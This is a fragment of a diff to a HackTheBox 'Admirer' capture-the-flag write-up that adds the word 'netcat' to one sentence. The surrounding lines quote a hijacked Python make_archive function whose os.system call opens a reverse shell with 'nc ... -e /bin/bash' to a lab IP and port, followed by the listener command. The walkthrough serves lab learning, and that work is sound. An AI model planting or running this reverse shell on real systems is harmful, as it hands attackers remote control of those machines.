hsnckkgl/CaptureTheFlag_WriteUps/HackTheBox_Admirer.md

 def make_archive(x, y, z):
 	os.system("nc 10.10.14.204 4444 -e '/bin/bash'")
 ```

 When this file is executed, it will execute ```/bin/bash``` on my IP and port 4444.
-So I need to listen this port.
+So I need to listen this port with netcat.
 ```
 ┌─[✗]─[root@hsn]─[/home/hsn]
 └──╼ #nc -nlvp 4444